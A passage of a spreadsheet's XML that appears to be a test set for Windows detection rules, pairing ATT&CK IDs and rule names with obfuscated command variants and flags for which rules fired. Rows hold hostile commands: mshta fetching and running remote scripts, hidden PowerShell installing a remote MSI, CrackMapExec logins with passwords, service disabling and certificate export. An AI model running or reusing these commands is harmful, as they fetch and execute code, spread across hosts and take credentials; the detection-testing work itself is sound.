      </c>
      <c r="F4002" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4002" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4002" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4002" s="43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4002" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4002" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4003" ht="15.75" customHeight="1" s="42">
      <c r="A4003" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4003" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4003" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4003" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4003" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType 'Dis'+'abled"</t>
        </is>
      </c>
      <c r="F4003" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4003" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4003" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4003" s="43" t="inlineStr">
        <is>
          <t>Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc); Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc)</t>
        </is>
      </c>
      <c r="J4003" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4003" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4004" ht="15.75" customHeight="1" s="42">
      <c r="A4004" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4004" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4004" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4004" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4004" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType [char]68+[char]105+[char]115+[char]97+[char]98+[char]108+[char]101+[char]100"</t>
        </is>
      </c>
      <c r="F4004" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4004" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4004" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4004" s="43" t="inlineStr">
        <is>
          <t>Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc)</t>
        </is>
      </c>
      <c r="J4004" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4004" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4005" ht="15.75" customHeight="1" s="42">
      <c r="A4005" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4005" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4005" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4005" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4005" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm</t>
        </is>
      </c>
      <c r="F4005" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4005" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4005" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4005" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J4005" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4005" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4006" ht="15.75" customHeight="1" s="42">
      <c r="A4006" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4006" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4006" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4006" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4006" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm"</t>
        </is>
      </c>
      <c r="F4006" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4006" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4006" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4006" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J4006" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4006" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4007" ht="15.75" customHeight="1" s="42">
      <c r="A4007" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4007" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4007" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4007" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4007" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\..\payload.chm</t>
        </is>
      </c>
      <c r="F4007" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4007" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4007" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4007" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J4007" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4007" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4008" ht="15.75" customHeight="1" s="42">
      <c r="A4008" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4008" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4008" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4008" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4008" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm::/script.htm</t>
        </is>
      </c>
      <c r="F4008" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4008" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4008" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4008" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J4008" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4008" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4009" ht="15.75" customHeight="1" s="42">
      <c r="A4009" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4009" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4009" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4009" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4009" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm --</t>
        </is>
      </c>
      <c r="F4009" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4009" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4009" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4009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09" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4009" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4010" ht="15.75" customHeight="1" s="42">
      <c r="A4010" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4010" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4010" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4010" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4010" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm"</t>
        </is>
      </c>
      <c r="F4010" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4010" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4010" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4010" s="43" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4010" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4010" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4011" ht="15.75" customHeight="1" s="42">
      <c r="A4011" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4011" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4011" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4011" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4011" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm\</t>
        </is>
      </c>
      <c r="F4011" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4011" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4011" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4011" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4011" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4011" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4012" ht="15.75" customHeight="1" s="42">
      <c r="A4012" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4012" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C4012" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D4012" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E4012" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm::</t>
        </is>
      </c>
      <c r="F4012" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4012" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4012" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4012" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4012" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4012" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4013" ht="15.75" customHeight="1" s="42">
      <c r="A4013" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4013" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C4013" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D4013" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E4013" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.100 --local-auth --username Administrator --password "P@ssw0rd123!" -x whoami</t>
        </is>
      </c>
      <c r="F4013" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4013" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4013" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4013" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4013" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4013" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4014" ht="15.75" customHeight="1" s="42">
      <c r="A4014" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4014" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C4014" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D4014" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E4014" s="43" t="inlineStr">
        <is>
          <t>cme.exe</t>
        </is>
      </c>
      <c r="F4014" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4014" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4014" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4014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14" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4014" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4015" ht="15.75" customHeight="1" s="42">
      <c r="A4015" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4015" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C4015" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D4015" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E4015" s="43" t="inlineStr">
        <is>
          <t>cme smb 172.16.10.5/24 -u 'user' -p 'pass' --local-auth</t>
        </is>
      </c>
      <c r="F4015" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4015" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4015" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4015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15" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4015" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4016" ht="15.75" customHeight="1" s="42">
      <c r="A4016" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4016" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C4016" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D4016" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E4016" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.0/24 -u"Administrator" -p"Password123!" --local-auth -x"whoami"</t>
        </is>
      </c>
      <c r="F4016" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4016" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4016" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4016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16" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4016" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4017" ht="15.75" customHeight="1" s="42">
      <c r="A4017" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4017" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4017" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4017" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4017" s="43" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()</t>
        </is>
      </c>
      <c r="F4017" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4017" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4017" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4017" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4017" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4017" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4018" ht="15.75" customHeight="1" s="42">
      <c r="A4018" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4018" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4018" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4018" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4018" s="43" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105.001/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4018" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4018" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4018" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4018" s="43" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4018" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4018" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4019" ht="15.75" customHeight="1" s="42">
      <c r="A4019" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4019" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4019" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4019" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4019" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close();"</t>
        </is>
      </c>
      <c r="F4019" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4019" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4019" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4019" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4019" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4019" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4020" ht="15.75" customHeight="1" s="42">
      <c r="A4020" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4020" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4020" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4020" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4020" s="43" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close();</t>
        </is>
      </c>
      <c r="F4020" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4020" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4020" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4020" s="43" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4020" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4020" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4021" ht="15.75" customHeight="1" s="42">
      <c r="A4021" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4021" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4021" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4021" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4021" s="43" t="inlineStr">
        <is>
          <t>mshta.exe \\live.sysinternals.com\tools\payload.hta</t>
        </is>
      </c>
      <c r="F4021" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4021" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4021" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4021" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4021" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4021" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4022" ht="15.75" customHeight="1" s="42">
      <c r="A4022" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B4022" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_mshtml_runhtmlapplication</t>
        </is>
      </c>
      <c r="C4022" s="43" t="inlineStr">
        <is>
          <t>Mshtml.DLL RunHTMLApplication Suspicious Usage</t>
        </is>
      </c>
      <c r="D4022" s="43" t="inlineStr">
        <is>
          <t>4782eb5a-a513-4523-a0ac-f3082b26ac5c</t>
        </is>
      </c>
      <c r="E4022" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe vbscript:"\..\mshtml,#135" +String(CreateObject("WScript.Shell").Run("calc.exe"),0)</t>
        </is>
      </c>
      <c r="F4022" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4022" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4022" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4022" s="43" t="inlineStr">
        <is>
          <t>Mshtml.DLL RunHTMLApplication Suspicious Usage (4782eb5a-a513-4523-a0ac-f3082b26ac5c); Mshtml.DLL RunHTMLApplication Suspicious Usage (4782eb5a-a513-4523-a0ac-f3082b26ac5c); Wscript Shell Run In CommandLine (2c28c248-7f50-417a-9186-a85b223010ee); Wscript Shell Run In CommandLine (2c28c248-7f50-417a-9186-a85b223010ee); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J4022" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4022" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4023" ht="15.75" customHeight="1" s="42">
      <c r="A4023" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4023" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4023" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4023" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4023" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden -c "$u='http://example.com/payload.msi'; $t='W'+'indowsInstaller.Installer'; $i=New-Object -ComObject $t; $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F4023" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4023" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4023" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4023" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J4023" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4023" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4024" ht="15.75" customHeight="1" s="42">
      <c r="A4024" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4024" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4024" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4024" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4024" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -Command "$u='http://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F4024" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4024" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4024" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4024" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J4024" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4024" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4025" ht="15.75" customHeight="1" s="42">
      <c r="A4025" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B4025" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4025" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4025" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4025" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Export-PfxCertificate -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4025" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4025" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4025" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4025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4025" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4025" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4026" ht="15.75" customHeight="1" s="42">
      <c r="A4026" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B4026" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4026" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4026" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4026" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'Export-PfxCertificate' -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4026" s="43" t="b">
        <v>1</v>
      </c>
